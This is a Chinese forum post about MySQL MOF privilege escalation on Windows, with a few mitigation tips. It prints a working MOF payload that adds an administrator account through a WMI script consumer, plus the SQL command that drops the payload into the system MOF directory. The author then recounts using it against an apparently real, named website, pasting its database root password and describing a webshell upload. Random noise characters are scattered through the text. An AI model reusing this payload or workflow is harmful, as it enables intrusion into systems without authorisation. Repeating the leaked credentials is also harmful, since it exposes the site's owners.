中国网络渗透测试联盟

标题: Mysql mof扩展漏洞实例与防范 [打印本页]

作者: admin    时间: 2013-1-4 19:49
标题: Mysql mof扩展漏洞实例与防范
Mysql mof扩展漏洞防范方法
& v# k0 p' a7 w' Y1 n2 l
; U' W0 P  L( I2 W. X$ p2 O; c网上公开的一些利用代码:
3 k9 [+ X1 V/ ]) {' E3 V! F7 m- o" ?% n& N8 n, x, ^$ C2 d+ o" `
#pragma namespace(“\\\\.\\root\\subscription”)
8 q9 `2 u- i! F9 k  Y2 j0 a5 L/ J
$ t' e* P# v' K# F7 T0 g0 ~/ x& hinstance of __EventFilter as $EventFilter   {   EventNamespace = “Root\\Cimv2″;   Name  = “filtP2″;   Query = “Select * From __InstanceModificationEvent ”   “Where TargetInstance Isa \”Win32_LocalTime\” ”   “And TargetInstance.Second = 5″;   QueryLanguage = “WQL”;   };   instance of ActiveScriptEventConsumer as $Consumer   {   Name = “consPCSV2″;   ScriptingEngine = “JScript”;   ScriptText =   “var WSH = new ActiveXObject(\”WScript.Shell\”)\nWSH.run(\”net.exe user admin admin /add\”)”;   };   instance of __FilterToConsumerBinding   {   Consumer   = $Consumer;   Filter = $EventFilter;   };- n; I6 {# {. L
: F# j1 [5 j5 b6 {  d3 i
5 d/ f2 Q" v; k, B4 B& }
8 m% e# ?/ U! C* c
: t/ Y$ t& W9 C* Y( ]

% m  a2 W; Q' ~连接mysql数据库后执行: select load_file(‘C:\\RECYCLER\\nullevt.mof’) into dumpfile ‘c:/windows/system32/wbem/mof/nullevt.mof’;. K2 L& X1 I1 {. h- g- u3 P
从上面代码来看得出解决办法:
# g3 l7 n) n$ n! U; r! d# i0 p& a8 U0 t, c4 ^8 l& j" N
1、mysql用户权限控制,禁止 “load_file”、”dumpfile”等函数
' {7 a0 A1 {, k, L: o. Y( D% Q
, E  P2 k) P% f. @' M  p8 F2、禁止使用”WScript.Shel”组件( ?& g) X. L, ~  h
( M% F, V% |5 K. \5 A/ E4 X9 g# q
3、目录权限c:/windows/system32/wbem/mof/ 删除内置特殊组CREATOR OWNER
& p+ i8 f8 O1 y3 ]: ?+ i- E6 d9 {' |9 K( R
当然上面是网上说的 感觉需要的权限很大 比如 root 还有mysql外链昨天碰到了就给大家演示下' E9 Q, l4 h0 O7 U5 S# M8 a

- N. |) R$ V- N2 C事情是这样发生的  一机油在论坛提问我就看了下 发现已经有大牛搞下了 说是用是 mysql mof扩展提权
: x$ Z0 Q* E, t( F% L4 P/ B
, A$ P. N, U8 }7 F; d8 A但是小菜发现没有听过于是赶紧去查资料学习…就有了上面的来着网上的内容
  r! P9 o, \2 M% A- g8 N
) ~" {: @/ n" h1 a8 G; _看懂了后就开始练手吧
8 I  l3 y# f' K! \/ {1 {& P$ {2 M  k, M3 l9 B
http://www.webbmw.com/config/config_ucenter.php 一句话 a
2 \% g+ j$ R, @1 d
1 F8 }5 d% D2 q( j$_config['db']['1']['dbhost'] = ‘localhost’; $_config['db']['1']['dbuser'] = ‘root’; $_config['db']['1']['dbpw'] = ‘tfr226206′; $_config['db']['1']['dbcharset'] = ‘gbk’; $_config['db']['1']['pconnect'] = ’0′; $_config['db']['1']['dbname'] = ‘webbmw’; $_config['db']['1']['tablepre'] = ‘pre_’; $_config['db']['common']['slave_except_table'] = ”; 有root密码啊。1 a3 _  {9 u+ J
: s: G: j& [& E3 h
于是直接用菜刀开搞
9 z" v0 k7 i0 a' c  {8 |
( W& K8 C! z/ F- ]. R上马先
! {: E6 O7 E/ G: [/ p/ [5 q" H2 D' S
* N) k! f( Y" B+ B+ f既然有了那些账号 之类的 于是我们就执行吧…….0 g( a& F  N3 m& r/ E

) r4 {% |/ B: H% j小小的说下' T* w# U' Q: D; w
+ H( F- [  B6 Q" e. ?
在这里第1次执行未成功        原因未知$ _$ ~8 F0 O! O9 ~8 q" r
; b8 v: ^; j; O, S; q. x5 t
我就猜想是否是因为我们执行的代码有问题 于是我就去我wooyun找的代码。+ s# ?4 G) D  u' q
9 G1 ]3 C: o+ v# c1 r; O8 w, P
#pragma namespace(“\\\\.\\root\\subscription”)2 L: z, q7 `$ h; c! O( ?
; n! C3 s1 i/ @
instance of __EventFilter as $EventFilter   {   EventNamespace = “Root\\Cimv2″;   Name  = “filtP2″;   Query = “Select * From __InstanceModificationEvent ”   “Where TargetInstance Isa \”Win32_LocalTime\” ”   “And TargetInstance.Second = 5″;   QueryLanguage = “WQL”;   };   instance of ActiveScriptEventConsumer as $Consumer   {   Name = “consPCSV2″;   ScriptingEngine = “JScript”;   ScriptText =   “var WSH = new ActiveXObject(\”WScript.Shell\”)\nWSH.run(\”net.exe user test test /add\”)”;   };   instance of __FilterToConsumerBinding   {   Consumer   = $Consumer;   Filter = $EventFilter;   };7 Z7 ?- g8 x% r; T" _0 y2 I

) J; N7 }1 k9 L$ N7 |% {9 F我是将文件放到C:\WINDOWS\temp\1.mof% `' T+ M( y' h/ a

( v( ~" Z: E3 d. @/ E: a% {所以我们就改下执行的代码. T+ u5 p5 J! U2 e' U( X0 e' B
0 Y9 b/ c2 F. s; p) S. j
select load_file(‘C:\WINDOWS\temp\1.mof‘) into dumpfile ‘c:/windows/system32/wbem/mof/nullevt.mof’;" y) }. c- u- k6 w- b, b$ ?, s
$ U3 L! A9 P( ]1 n6 A8 t

5 O. a  {, B- x3 u5 k
+ y; v2 k& l- g1 A7 x' q% q& Z. a但是 你会发现账号还是没有躺在那里。。
) r, d3 L2 E- J" S, t- L2 x: s
+ z5 C; H# C8 a6 x- k1 M7 ^  E. x; w于是我就感觉蛋疼
+ ]  [9 L! L1 P2 A( X2 Q  n# B. F
- C: e  |* B/ q% Q9 |就去一个一个去执行 但是执行到第2个 mysql时就成功了………" V/ B* M* q4 a1 D9 n* I4 y! N

3 k* A2 l) U* `5 U- V6 P7 _. c
3 d6 H0 T) V  M0 s3 i. J
  z2 i" v4 p! W+ Z* t+ S但是其他库均不成功…
6 F# A; y$ e: u$ w  S& E) i0 F) ?: z) c& i4 l) N* N
我就很费解呀 到底为什么不成功求大牛解答…' m) b6 U" H3 ~$ J8 N8 b# ~

" }& s* ]5 ]  b$ h& S: v
  _, p: B- W- o) b
# Q0 O2 P7 s  U




欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2